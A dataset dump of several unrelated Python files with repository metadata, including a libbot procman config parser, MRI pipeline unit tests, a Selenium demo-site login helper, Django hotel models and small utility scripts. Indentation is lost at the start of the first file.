6cf5c425b9a007093ff73fa1c5872a082b863b03 | 18,872 | py | Python | externals/libbot/bot2-procman/python/src/bot_procman/sheriff_config.py | ericmanzi/double_pendulum_lqr | 76bba3091295abb7d412c4a3156258918f280c96 | [
"BSD-3-Clause"
] | null | null | null | externals/libbot/bot2-procman/python/src/bot_procman/sheriff_config.py | ericmanzi/double_pendulum_lqr | 76bba3091295abb7d412c4a3156258918f280c96 | [
"BSD-3-Clause"
] | null | null | null | externals/libbot/bot2-procman/python/src/bot_procman/sheriff_config.py | ericmanzi/double_pendulum_lqr | 76bba3091295abb7d412c4a3156258918f280c96 | [
"BSD-3-Clause"
] | null | null | null | TokIdentifier = "Identifier"
TokOpenStruct = "OpenStruct"
TokCloseStruct = "CloseStruct"
TokAssign = "Assign"
TokEndStatement = "EndStatement"
TokString = "String"
TokEOF = "EOF"
TokComment = "Comment"
TokInteger = "Integer"
class Token(object):
def __init__ (self, type, val):
self.type = type
self.val = val
class ParseError (ValueError):
def __init__ (self, lineno, line_pos, line_text, tokenval, msg):
self.lineno = lineno
self.offset = line_pos
self.text = line_text
self.token = tokenval
self.msg = msg
def __str__ (self):
ntabs = self.text.count ("\t")
tokenstr = ""
if self.token is not None:
tokenstr = "token %s" % self.token
s = """%s
line %d col %s %s
%s
""" % (self.msg, self.lineno, self.offset, tokenstr, self.text)
s += " " * (self.offset - ntabs - 1) + "\t" * ntabs + "^"
return s
class Tokenizer(object):
def __init__ (self, f):
self.f = f
self.unget_char = None
self.line_pos = 0
self.line_len = 0
self.line_buf = ""
self.line_num = 1
self.tok_pos = 0
self.prev_tok_pos = 0
def _next_char (self):
if self.unget_char is not None:
c = self.unget_char
self.unget_char = None
return c
else:
if self.line_pos == self.line_len:
self.line_buf = self.f.readline ()
if not len (self.line_buf):
return ''
self.line_len = len (self.line_buf)
self.line_pos = 0
c = self.line_buf[self.line_pos]
self.line_pos += 1
if c == '\n':
self.line_num += 1
return c
def _ungetc (self, c):
if not c: return
self.unget_char = c
def _unescape (self, c):
d = { "n": "\n",
"r": "\r",
"t": "\t" }
if c in d: return d[c]
return c
    def next_token (self):
        c = self._next_char ()
        while c and c.isspace ():
            c = self._next_char ()
        if not c: return Token (TokEOF, "")

        self.prev_tok_pos = self.tok_pos
        self.tok_pos = self.line_pos

        simple_tokens = {
            "=" : TokAssign,
            ";" : TokEndStatement,
            "{" : TokOpenStruct,
            "}" : TokCloseStruct
            }

        if c in simple_tokens:
            return Token (simple_tokens[c], c)

        tok_chars = [ c ]

        if c == "#":
            while True:
                c = self._next_char ()
                if not c or c == "\n":
                    return Token (TokComment, "".join (tok_chars))
                tok_chars.append (c)

        if c == "\"":
            tok_chars = []
            while True:
                c = self._next_char ()
                if c == "\n":
                    raise ParseError (self.line_num, self.tok_pos,
                            self.line_buf, None, "Unterminated string constant")
                if c == "\\": c = self._unescape (self._next_char ())
                elif not c or c == "\"":
                    return Token (TokString, "".join (tok_chars))
                tok_chars.append (c)

        if c.isalpha () or c == "_":
            while True:
                c = self._next_char ()
                if not c.isalnum () and c not in "_-":
                    self._ungetc (c)
                    return Token (TokIdentifier, "".join (tok_chars))
                tok_chars.append (c)

        if c.isdigit():
            while True:
                c = self._next_char()
                if not c.isdigit():
                    self._ungetc(c)
                    return Token(TokInteger, "".join(tok_chars))
                tok_chars.append(c)

        raise ParseError (self.line_num, self.line_pos,
                self.line_buf, None, "Invalid character")
def escape_str(text):
    def escape_char(c):
        if c in r'\"':
            return '\\' + c
        return c
    return "".join([ escape_char(c) for c in text ])

class CommandNode(object):
    def __init__ (self):
        self.attributes = {
            "exec" : None,
            "host" : None,
            "group" : "",
            "nickname" : "",
            "stop_signal" : 0,
            "stop_time_allowed" : 0
            }

    def to_config_string(self, indent = 0):
        s = "    " * indent
        lines = []
        nickname = self.attributes["nickname"]
        if len(nickname):
            lines.append (s + "cmd \"%s\" {" % escape_str(nickname))
        else:
            lines.append (s + "cmd {")
        pairs = self.attributes.items()
        pairs.sort()
        for key, val in pairs:
            if not val:
                continue
            if key in [ "group", "nickname" ]:
                continue
            lines.append (s + "    %s = \"%s\";" % (key, escape_str(val)))
        lines.append (s + "}")
        return ("\n".join (lines))

    def __str__ (self):
        return self.to_config_string()
class GroupNode(object):
    def __init__ (self, name):
        self.name = name
        self.commands = []
        self.subgroups = {}

    def add_command (self, command):
        command.attributes["group"] = self.name
        self.commands.append (command)

    def get_subgroup(self, name_parts, create=False):
        if not name_parts:
            return self
        next_name = name_parts[0]
        if next_name in self.subgroups:
            return self.subgroups[next_name].get_subgroup(name_parts[1:], create)
        elif create:
            subgroup = GroupNode(next_name)
            self.subgroups[next_name] = subgroup
            return subgroup.get_subgroup(name_parts[1:], create)
        else:
            raise KeyError()

    def to_config_string(self, indent=0):
        s = "    " * indent
        if self.name == "":
            assert indent == 0
            val = "\n".join([group.to_config_string(0) for group in self.subgroups.values()])
            val = val + "\n".join([cmd.to_config_string(0) for cmd in self.commands]) + "\n"
        else:
            val = "%sgroup \"%s\" {\n" % (s, self.name)
            val = val + "\n".join([group.to_config_string(indent+1) for group in self.subgroups.values()])
            val = val + "\n".join([cmd.to_config_string(indent+1) for cmd in self.commands])
            val = val + "\n%s}\n" % s
        return val

    def __str__ (self):
        return self.to_config_string(0)
class StartStopRestartActionNode(object):
    def __init__(self, action_type, ident_type, ident, wait_status):
        assert action_type in ["start", "stop", "restart"]
        assert ident_type in [ "everything", "group", "cmd" ]
        self.action_type = action_type
        self.ident_type = ident_type
        self.wait_status = wait_status
        assert wait_status in [None, "running", "stopped"]
        if self.ident_type == "everything":
            self.ident = None
        else:
            self.ident = ident
            assert self.ident is not None

    def __str__(self):
        if self.ident_type == "everything":
            ident_str = self.ident_type
        else:
            ident_str = "%s \"%s\"" % (self.ident_type, escape_str(self.ident))
        if self.wait_status is not None:
            return "%s %s wait \"%s\";" % (self.action_type,
                    ident_str, self.wait_status)
        else:
            return "%s %s;" % (self.action_type, ident_str)

class WaitMsActionNode(object):
    def __init__(self, delay_ms):
        self.delay_ms = delay_ms
        self.action_type = "wait_ms"

    def __str__(self):
        return "wait ms %d;" % self.delay_ms

class WaitStatusActionNode(object):
    def __init__(self, ident_type, ident, wait_status):
        self.ident_type = ident_type
        self.ident = ident
        self.wait_status = wait_status
        self.action_type = "wait_status"
        assert wait_status in ["running", "stopped"]

    def __str__(self):
        return "wait %s \"%s\" status \"%s\";" % \
                (self.ident_type, escape_str(self.ident), self.wait_status)

class RunScriptActionNode(object):
    def __init__(self, script_name):
        self.script_name = script_name
        self.action_type = "run_script"

    def __str__(self):
        return "run_script \"%s\";" % escape_str(self.script_name)

class ScriptNode(object):
    def __init__(self, name):
        self.name = name
        self.actions = []

    def add_action(self, action):
        assert action is not None
        assert hasattr(action, "action_type")
        self.actions.append(action)

    def __str__(self):
        val = "script \"%s\" {" % escape_str(self.name)
        for action in self.actions:
            val = val + "\n    " + str(action)
        val = val + "\n}\n"
        return val
class ConfigNode(object):
    def __init__ (self):
        self.scripts = {}
        self.root_group = GroupNode("")

    def _normalize_group_name(self, name):
        if not name.startswith("/"):
            name = "/" + name
        while name.find("//") >= 0:
            name = name.replace("//", "/")
        return name.rstrip("/")

    def has_group(self, group_name):
        name = self._normalize_group_name(group_name)
        # Split the *normalized* name and skip its empty leading component so
        # the walk matches get_group() below (the original split the raw
        # group_name and iterated every component, which could never succeed).
        parts = name.split("/")
        group = self.root_group
        assert group.name == parts[0]
        for part in parts[1:]:
            if part in group.subgroups:
                group = group.subgroups[part]
            else:
                return False
        return True

    def get_group (self, group_name, create=False):
        name = self._normalize_group_name(group_name)
        parts = name.split("/")
        group = self.root_group
        return group.get_subgroup(parts[1:], create)

    def add_script (self, script):
        assert script.name not in self.scripts
        self.scripts[script.name] = script

    def __str__ (self):
        val = self.root_group.to_config_string()
        scripts = sorted(self.scripts.values(), key=lambda s: s.name.lower())
        val += "\n" + "\n".join([str(script) for script in scripts])
        return val
class Parser:
    def __init__ (self):
        self.tokenizer = None
        self._cur_tok = None
        self._next_tok = None

    def _get_token (self):
        self._cur_tok = self._next_tok
        self._next_tok = self.tokenizer.next_token ()
        while self._next_tok.type == TokComment:
            self._next_tok = self.tokenizer.next_token ()
        return self._cur_tok

    def _eat_token (self, tok_type):
        if self._next_tok and self._next_tok.type == tok_type:
            self._get_token ()
            return True
        return False

    def _fail (self, msg):
        raise ParseError (self.tokenizer.line_num,
                self.tokenizer.prev_tok_pos,
                self.tokenizer.line_buf,
                self._cur_tok.val, msg)

    def _fail_next_token (self, msg):
        raise ParseError (self.tokenizer.line_num,
                self.tokenizer.tok_pos,
                self.tokenizer.line_buf,
                self._next_tok.val, msg)

    def _eat_token_or_fail(self, tok_type, err_msg):
        if not self._eat_token(tok_type):
            self._fail_next_token(err_msg)
        return self._cur_tok.val

    def _expect_identifier(self, identifier, err_msg = None):
        if err_msg is None:
            err_msg = "Expected %s" % identifier
        self._eat_token_or_fail(TokIdentifier, err_msg)
        if self._cur_tok.val != identifier:
            self._fail(err_msg)

    def _parse_identifier_one_of(self, valid_identifiers):
        err_msg = "Expected one of %s" % str(valid_identifiers)
        self._eat_token_or_fail(TokIdentifier, err_msg)
        result = self._cur_tok.val
        if result not in valid_identifiers:
            self._fail(err_msg)
        return result

    def _parse_string_one_of(self, valid_strings):
        err_msg = "Expected one of %s" % str(valid_strings)
        self._eat_token_or_fail(TokString, err_msg)
        result = self._cur_tok.val
        if result not in valid_strings:
            self._fail(err_msg)
        return result

    def _parse_string_or_fail(self):
        self._eat_token_or_fail(TokString, "Expected string literal")
        return self._cur_tok.val
    def _parse_command_param_list (self, cmd):
        if not self._eat_token (TokIdentifier):
            return
        attrib_name = self._cur_tok.val
        attribs = { "exec" : TokString,
                    "host" : TokString,
                    "auto_respawn" : TokString,
                    "group" : TokString,
                    "stop_signal" : TokInteger,
                    "stop_time_allowed" : TokInteger }
        if attrib_name not in attribs:
            self._fail("Unrecognized attribute %s" % attrib_name)
        self._eat_token_or_fail(TokAssign, "Expected '='")
        if attribs[attrib_name] == TokString:
            attrib_val = self._parse_string_or_fail()
        else:
            self._eat_token_or_fail(TokInteger, "Expected integer literal")
            attrib_val = int(self._cur_tok.val)
        self._eat_token_or_fail(TokEndStatement, "Expected ';'")
        if attrib_name == "stop_signal" and attrib_val < 1:
            self._fail("Invalid value specified for command attribute 'stop_signal'")
        elif attrib_name == "stop_time_allowed" and attrib_val < 1:
            self._fail("Invalid value specified for command attribute 'stop_time_allowed'")
        cmd.attributes[attrib_name] = attrib_val
        return self._parse_command_param_list (cmd)

    def _parse_command (self):
        cmd = CommandNode ()
        if self._eat_token(TokString):
            cmd.attributes["nickname"] = self._cur_tok.val
            if "/" in self._cur_tok.val:
                self._fail("'/' character not allowed in command name")
        self._eat_token_or_fail (TokOpenStruct, "Expected '{'")
        self._parse_command_param_list (cmd)
        self._eat_token_or_fail (TokCloseStruct, "Expected '}'")
        if not cmd.attributes["exec"]:
            self._fail ("Invalid command defined -- no executable specified")
        return cmd
    def _parse_group(self, parent_group):
        self._eat_token_or_fail (TokString, "Expected group name string")
        if "/" in self._cur_tok.val:
            self._fail("'/' character is not allowed in group name")
        elif not self._cur_tok.val.strip():
            self._fail("Empty group name is not allowed")
        name = self._cur_tok.val
        group = parent_group.get_subgroup([name], True)
        self._eat_token_or_fail (TokOpenStruct, "Expected '{'")
        while self._eat_token(TokIdentifier):
            if self._cur_tok.val == "cmd":
                group.add_command(self._parse_command())
            elif self._cur_tok.val == "group":
                self._parse_group(group)
            else:
                self._fail("Expected one of [group, cmd]")
        self._eat_token_or_fail(TokCloseStruct, "Expected '}'")

    def _parse_start_stop_restart_action(self, action_type):
        valid_ident_types = [ "everything", "cmd", "group" ]
        ident_type = self._parse_identifier_one_of(valid_ident_types)
        ident = None
        if ident_type != "everything":
            ident = self._parse_string_or_fail()
        if self._eat_token(TokEndStatement):
            return StartStopRestartActionNode(action_type, ident_type, ident,
                    None)
        self._expect_identifier("wait", "Expected ';' or 'wait'")
        wait_status = self._parse_string_one_of(["running", "stopped"])
        self._eat_token_or_fail(TokEndStatement, "Expected ';'")
        return StartStopRestartActionNode(action_type, ident_type, ident,
                wait_status)

    def _parse_wait_action(self):
        wait_type = self._parse_identifier_one_of(["ms", "cmd", "group"])
        if wait_type == "ms":
            err_msg = "Expected integer constant"
            delay_ms = int(self._eat_token_or_fail(TokInteger, err_msg))
            self._eat_token_or_fail(TokEndStatement, "Expected ';'")
            return WaitMsActionNode(delay_ms)
        else:
            ident = self._parse_string_or_fail()
            self._expect_identifier("status")
            wait_status = self._parse_string_one_of(["running", "stopped"])
            self._eat_token_or_fail(TokEndStatement, "Expected ';'")
            return WaitStatusActionNode(wait_type, ident, wait_status)

    def _parse_run_script(self):
        script_name = self._eat_token_or_fail(TokString, "expected script name")
        self._eat_token_or_fail(TokEndStatement, "Expected ';'")
        return RunScriptActionNode(script_name)

    def _parse_script_action_list(self):
        self._eat_token_or_fail (TokOpenStruct, "Expected '{'")
        actions = []
        while self._eat_token(TokIdentifier):
            action_type = self._cur_tok.val
            if action_type in [ "start", "stop", "restart" ]:
                action = self._parse_start_stop_restart_action(action_type)
                actions.append(action)
            elif action_type == "wait":
                actions.append(self._parse_wait_action())
            elif action_type == "run_script":
                actions.append(self._parse_run_script())
            else:
                self._fail("Unexpected token %s" % action_type)
        self._eat_token_or_fail(TokCloseStruct, "Unexpected token")
        return actions

    def _parse_script(self):
        name = self._eat_token_or_fail(TokString, "expected script name")
        script_node = ScriptNode(name)
        for action in self._parse_script_action_list():
            script_node.add_action(action)
        self._node.add_script(script_node)

    def _parse_listdecl(self):
        while True:
            if self._eat_token(TokEOF):
                return
            ident_type = self._parse_identifier_one_of(["cmd", "group", "script"])
            if ident_type == "cmd":
                self._node.root_group.add_command(self._parse_command())
            if ident_type == "group":
                self._parse_group(self._node.root_group)
            if ident_type == "script":
                self._parse_script()

    def parse (self, f):
        self.tokenizer = Tokenizer (f)
        self._cur_tok = None
        self._next_tok = None
        self._get_token ()
        self._node = ConfigNode()
        self._parse_listdecl()
        return self._node
def config_from_filename (fname):
    # open() instead of the deprecated Python 2 file() builtin.
    return Parser ().parse (open (fname))
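
# Illustrative usage sketch (the config text below is hypothetical; Python 2
# syntax, like the rest of this module):
#
#   import StringIO
#   cfg = 'group "vision" { cmd "cam" { exec = "./camera_driver"; host = "pc1"; } }'
#   node = Parser ().parse (StringIO.StringIO (cfg))
#   print node.has_group ("vision")   # True
#   print node                        # pretty-prints back to config syntax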

if __name__ == "__main__":
    import sys
    try:
        fname = sys.argv[1]
    except IndexError:
        print "usage: sheriff_config.py <fname>"
        sys.exit (1)
    print config_from_filename (fname)
| 34.755064 | 106 | 0.572011 | 2,245 | 18,872 | 4.499777 | 0.093987 | 0.023758 | 0.033261 | 0.030489 | 0.411206 | 0.332013 | 0.243714 | 0.174421 | 0.1176 | 0.077014 | 0 | 0.002249 | 0.316819 | 18,872 | 542 | 107 | 34.819188 | 0.781277 | 0 | 0 | 0.262821 | 0 | 0 | 0.081708 | 0 | 0.002137 | 0 | 0 | 0 | 0.021368 | 0 | null | null | 0 | 0.002137 | null | null | 0.004274 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f03f062a720d101370b2aeaa19a382b35aa2aa7 | 2,203 | py | Python | test/unittests/analysis/mri/test_base.py | monashbiomedicalimaging/nianalysis | d69c38eed52ae557a849889930cd659cdb3c6401 | [
"Apache-2.0"
] | 2 | 2019-11-14T01:02:26.000Z | 2022-03-17T01:47:01.000Z | test/unittests/analysis/mri/test_base.py | MonashBI/banana | 37364243b520ab14ac1243005dbd465f824542b4 | [
"Apache-2.0"
] | 18 | 2019-04-03T04:25:55.000Z | 2020-06-08T06:00:56.000Z | test/unittests/analysis/mri/test_base.py | MonashBI/nianalysis | 37364243b520ab14ac1243005dbd465f824542b4 | [
"Apache-2.0"
] | 4 | 2018-05-23T07:13:02.000Z | 2018-08-24T04:05:31.000Z | from banana.analysis.mri.base import MriAnalysis
from banana.utils.testing import AnalysisTester, PipelineTester, TEST_CACHE_DIR
from banana import FilesetFilter
from arcana.repository.xnat import XnatRepo
class TestMriBaseDefault(AnalysisTester):

    analysis_class = MriAnalysis
    parameters = {'mni_tmpl_resolution': 1}
    inputs = ['magnitude', 'coreg_ref']


class TestMriAnalysis(PipelineTester):

    name = 'BaseMri'
    analysis_class = MriAnalysis
    ref_repo = XnatRepo(server='https://mbi-xnat.erc.monash.edu.au',
                        project_id='TESTBANANAMRI',
                        cache_dir=TEST_CACHE_DIR)
    parameters = {
        'mni_tmpl_resolution': 1}

    def test_preprocess_channels_pipeline(self):
        pass  # Need to upload some raw channel data for this

    def test_coreg_pipeline(self):
        self.run_pipeline_test('coreg_pipeline')

    def test_brain_extraction_pipeline(self):
        self.run_pipeline_test('brain_extraction_pipeline')

    def test_brain_coreg_pipeline(self):
        self.run_pipeline_test('brain_coreg_pipeline',
                               add_inputs=['coreg_ref'])

    def test_coreg_fsl_mat_pipeline(self):
        self.run_pipeline_test('coreg_fsl_mat_pipeline',
                               add_inputs=['coreg_ref'])

    def test_coreg_ants_mat_pipeline(self):
        self.run_pipeline_test('coreg_ants_mat_pipeline',
                               add_inputs=['coreg_ref'])

    def test_coreg_to_tmpl_pipeline(self):
        self.run_pipeline_test('coreg_to_tmpl_pipeline',
                               add_inputs=['coreg_ref'],
                               test_criteria={
                                   'coreg_to_tmpl': {'rms_tol': 20000}})

    def test_qform_transform_pipeline(self):
        self.run_pipeline_test('qform_transform_pipeline',
                               add_inputs=['coreg_ref'])

    def test_preprocess_pipeline(self):
        self.run_pipeline_test('preprocess_pipeline')

    def test_header_extraction_pipeline(self):
        self.run_pipeline_test('header_extraction_pipeline')

    def test_motion_mat_pipeline(self):
        self.run_pipeline_test('motion_mat_pipeline')
| 34.968254 | 79 | 0.663187 | 250 | 2,203 | 5.432 | 0.296 | 0.056701 | 0.11782 | 0.139912 | 0.467599 | 0.388807 | 0.343152 | 0.143594 | 0.05891 | 0 | 0 | 0.00425 | 0.252383 | 2,203 | 62 | 80 | 35.532258 | 0.820279 | 0.020427 | 0 | 0.133333 | 0 | 0 | 0.180427 | 0.065863 | 0 | 0 | 0 | 0 | 0 | 1 | 0.244444 | false | 0.022222 | 0.088889 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f06666109409538bd3e098b187da1a2987b3910 | 1,034 | py | Python | application.py | ane4katv/python_training | d8ba6dbed0b43402e8b09a5b6cf8de52703e18a1 | [
"Apache-2.0"
] | null | null | null | application.py | ane4katv/python_training | d8ba6dbed0b43402e8b09a5b6cf8de52703e18a1 | [
"Apache-2.0"
] | null | null | null | application.py | ane4katv/python_training | d8ba6dbed0b43402e8b09a5b6cf8de52703e18a1 | [
"Apache-2.0"
] | null | null | null | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
class Application:

    def __init__(self):
        self.wd = webdriver.Chrome(executable_path='/Users/atvelova/Documents/python_training/chromedriver')
        self.wd.implicitly_wait(60)

    def open_page(self):
        wd = self.wd
        wd.get("http://hrm.seleniumminutes.com/symfony/web/index.php/auth/login")

    def login(self):
        wd = self.wd
        self.open_page()
        wd.find_element(By.ID, "txtUsername").click()
        wd.find_element(By.ID, "txtUsername").send_keys("admin")
        wd.find_element(By.ID, "txtPassword").send_keys("Password")
        wd.find_element(By.ID, "txtPassword").send_keys(Keys.ENTER)
        self.wd.implicitly_wait(60)

    def logout(self):
        wd = self.wd
        wd.find_element(By.ID, "welcome").click()
        self.wd.implicitly_wait(60)
        wd.find_element(By.LINK_TEXT, "Logout").click()

    def destroy(self):
        self.wd.quit() | 32.3125 | 108 | 0.662476 | 140 | 1,034 | 4.742857 | 0.385714 | 0.099398 | 0.11747 | 0.135542 | 0.365964 | 0.268072 | 0.108434 | 0.108434 | 0 | 0 | 0 | 0.007264 | 0.201161 | 1,034 | 32 | 109 | 32.3125 | 0.79661 | 0 | 0 | 0.24 | 0 | 0 | 0.180676 | 0.052174 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0.08 | 0.12 | 0 | 0.36 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
9f0cf9dacde698a4632f08679730078e59456da8 | 720 | py | Python | scripts/subsample_model_files.py | musicpiano/mlmicrophysics | 720e09b9003285e4e601df8befd58337bee691f5 | [
"MIT"
] | 4 | 2021-01-05T13:18:28.000Z | 2021-09-29T09:53:28.000Z | scripts/subsample_model_files.py | musicpiano/mlmicrophysics | 720e09b9003285e4e601df8befd58337bee691f5 | [
"MIT"
] | 5 | 2020-11-16T15:53:24.000Z | 2021-07-22T20:16:11.000Z | scripts/subsample_model_files.py | musicpiano/mlmicrophysics | 720e09b9003285e4e601df8befd58337bee691f5 | [
"MIT"
] | 4 | 2020-07-08T13:04:44.000Z | 2022-01-09T13:36:55.000Z | import xarray as xr
import argparse
import os
from glob import glob

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--input", help="Input File Directory")
    parser.add_argument("-o", "--output", help="Output file directory")
    parser.add_argument("-x", "--xsub", type=int, default=2, help="X and Y subset factor")
    parser.add_argument("-z", "--zsub", type=int, default=1, help="Z subset factor")
    parser.add_argument("-t", "--tsub", type=int, default=1, help="Time subset factor")
    args = parser.parse_args()
    nc_files = sorted(glob(args.input + "*.nc"))
    for nc_file in nc_files:
        ds = xr.open_dataset(nc_file)
        # The original loop only opened and closed each file; the slicing below
        # sketches the intended subsampling. The dimension names (time, lev,
        # lat, lon) are assumptions -- adjust them to match the model output.
        indexers = {dim: slice(None, None, step)
                    for dim, step in [("time", args.tsub), ("lev", args.zsub),
                                      ("lat", args.xsub), ("lon", args.xsub)]
                    if dim in ds.dims and step > 1}
        if indexers:
            ds = ds.isel(indexers)
        ds.to_netcdf(os.path.join(args.output, os.path.basename(nc_file)))
        ds.close()

if __name__ == "__main__":
    main() | 37.894737 | 90 | 0.652778 | 103 | 720 | 4.378641 | 0.475728 | 0.099778 | 0.18847 | 0.097561 | 0.345898 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005051 | 0.175 | 720 | 19 | 91 | 37.894737 | 0.754209 | 0 | 0 | 0 | 0 | 0 | 0.208044 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.176471 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f109b8c71bc216b9f304425a1fe0bb9187d6712 | 1,187 | py | Python | TaskManage/models.py | CooloiStudio/django-hotel-manager | dce558bfeedbb45e5d58bc875dfa936940d57ed5 | [
"MIT"
] | 1 | 2021-08-07T18:44:32.000Z | 2021-08-07T18:44:32.000Z | TaskManage/models.py | CooloiStudio/django-hotel-manager | dce558bfeedbb45e5d58bc875dfa936940d57ed5 | [
"MIT"
] | null | null | null | TaskManage/models.py | CooloiStudio/django-hotel-manager | dce558bfeedbb45e5d58bc875dfa936940d57ed5 | [
"MIT"
] | 1 | 2017-09-10T07:23:05.000Z | 2017-09-10T07:23:05.000Z | # coding: utf-8
from django.db import models
from django.contrib.auth.models import User
from RoomManage.models import Room, Customs
# Create your models here.
class Task(models.Model):
    context = models.TextField()
    date = models.DateTimeField()
    task_status = models.CharField(max_length=20, default='undo')
    user = models.ForeignKey(User)
    room = models.ForeignKey(Room)

    def __str__(self):
        return '%s %s - %s' % (self.user.last_name, self.user.first_name, self.room.room_num)


class Attendance(models.Model):
    clock_in = models.DateTimeField()
    clock_out = models.DateTimeField(null=True, blank=True)
    user = models.ForeignKey(User)

    def __str__(self):
        return '%s %s -- %s' % (self.user.last_name, self.user.first_name, self.clock_in)


class Emergency(models.Model):
    date_time = models.DateTimeField()
    room = models.ForeignKey(Room)
    user = models.ForeignKey(User, null=True, blank=True)

    def __str__(self):
        return '%s %s - %s' % (self.user.last_name, self.user.first_name, self.room.room_num)

    class Meta:
        permissions = (
            ('create_emergency', 'can create an emergency'),
        )
| 27.604651 | 93 | 0.676495 | 157 | 1,187 | 4.942675 | 0.343949 | 0.015464 | 0.07732 | 0.092784 | 0.257732 | 0.257732 | 0.257732 | 0.257732 | 0.257732 | 0.257732 | 0 | 0.003145 | 0.196293 | 1,187 | 42 | 94 | 28.261905 | 0.810273 | 0.032013 | 0 | 0.333333 | 0 | 0 | 0.0637 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0.111111 | 0.888889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
9f10e94c964ce66f7a8b92cc263cc90bcb46f403 | 400 | py | Python | test/pypendency/test_parser.py | Taschenbergerm/pypendency | d941f584cabd0e6acc56ec3df43be174198ae4b7 | [
"Apache-2.0"
] | null | null | null | test/pypendency/test_parser.py | Taschenbergerm/pypendency | d941f584cabd0e6acc56ec3df43be174198ae4b7 | [
"Apache-2.0"
] | 1 | 2021-06-23T15:05:40.000Z | 2021-06-23T15:05:40.000Z | test/pypendency/test_parser.py | Taschenbergerm/pypendency | d941f584cabd0e6acc56ec3df43be174198ae4b7 | [
"Apache-2.0"
] | null | null | null | import pathlib
import pytest
from pypendency.parser.yaml import Parser
from pypendency.lexer import LarkRelationLexer
def test_read_yaml_node_length():
    file = pathlib.Path(__file__).parent / "example.yml"
    lexer = LarkRelationLexer()
    p = Parser(lexer=lexer, folder=pathlib.Path(__file__).parent)
    g = p.parse("example.yml")
    length = len(g.nodes)
    pytest.assume(length == 4)
| 23.529412 | 65 | 0.73 | 52 | 400 | 5.384615 | 0.519231 | 0.1 | 0.107143 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002976 | 0.16 | 400 | 16 | 66 | 25 | 0.830357 | 0 | 0 | 0 | 0 | 0 | 0.055138 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.363636 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
9f1a77ebd61987c0e53368471dad9d42d5b2f750 | 548 | py | Python | mtianyan/listname.py | mtianyan/mtianyan | 6c8f3d2076da4f472f6734714f1352ffaa5264b1 | [
"Apache-2.0"
] | null | null | null | mtianyan/listname.py | mtianyan/mtianyan | 6c8f3d2076da4f472f6734714f1352ffaa5264b1 | [
"Apache-2.0"
] | null | null | null | mtianyan/listname.py | mtianyan/mtianyan | 6c8f3d2076da4f472f6734714f1352ffaa5264b1 | [
"Apache-2.0"
] | 4 | 2020-11-29T14:25:39.000Z | 2021-04-05T07:17:56.000Z | import os.path
filepathlist = []
filenamelist = []

def processDirectory(args, dirname, filenames):
    for filename in filenames:
        file_path = os.path.join(dirname, filename)
        if os.path.isfile(file_path):
            filepathlist.append(file_path)
            filenamelist.append(filename)

def getpatch(path):
    # os.path.walk is Python 2 only (removed in Python 3; use os.walk there).
    os.path.walk(r'%s' % path, processDirectory, None)
    return filepathlist

# Raw string so the Windows path's backslashes are not treated as escapes.
getpatch(r'H:\CodePath\NoteBook\uber_input')
fw = open('data_list.txt', 'w')
for item in filenamelist:
    fw.write(item + '\n')
fw.close()
| 28.842105 | 54 | 0.662409 | 67 | 548 | 5.343284 | 0.567164 | 0.067039 | 0.055866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.213504 | 548 | 18 | 55 | 30.444444 | 0.830626 | 0 | 0 | 0 | 0 | 0 | 0.092453 | 0.058491 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0625 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f1c5fd349b7d26a420b931b4c0db17b38bcc27d | 647 | py | Python | test/lit/memberfield/__init__.py | sivachandra/gala | 6d7e5fd3cf3c319062a3985dbffd791944e180e9 | [
"Apache-2.0"
